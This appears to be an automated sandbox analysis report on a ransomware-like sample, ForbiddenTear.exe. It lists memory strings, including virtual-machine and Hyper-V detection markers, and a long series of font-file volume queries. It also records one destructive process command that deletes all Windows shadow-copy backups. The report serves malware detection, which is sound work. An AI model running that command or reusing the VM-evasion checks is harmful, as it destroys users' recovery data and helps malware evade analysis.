Source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp | Binary or memory string: .?AVMCIMPPPlayer@@
Source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp | Binary or memory string: .?AVMCIMPPWorld@@
Source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp | Binary or memory string: .?AVMCIException@@
Source: ForbiddenTear.exe | Binary or memory string: vmtoolsd
Source: ForbiddenTear.exe, 00000000.00000002.255651770.0000000008580000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: ForbiddenTear.exe, 00000000.00000002.255651770.0000000008580000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp | Binary or memory string: .?AVMCIMPPAuthor@@
Source: ForbiddenTear.exe, 00000000.00000002.245582108.00000000003DB000.00000002.00020000.sdmp | Binary or memory string: WmiPrvSE%vmware-converter-a
Source: ForbiddenTear.exe, 00000000.00000002.245907968.0000000000A53000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: ForbiddenTear.exe, 00000000.00000002.255651770.0000000008580000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\System32\cdd.dll | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Process created: C:\Windows\System32\cmd.exe 'cmd' /C vssadmin Delete Shadows /All /Quiet
Source: ForbiddenTear.exe, 00000000.00000002.246194238.00000000011C0000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: ForbiddenTear.exe, 00000000.00000002.246194238.00000000011C0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: ForbiddenTear.exe, 00000000.00000002.255988303.000000000A094000.00000004.00000001.sdmp | Binary or memory string: gHExitMaximize&Click to activateShell_TrayWndTrayNotifyWndp
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Users\user\Desktop\ForbiddenTear.exe VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
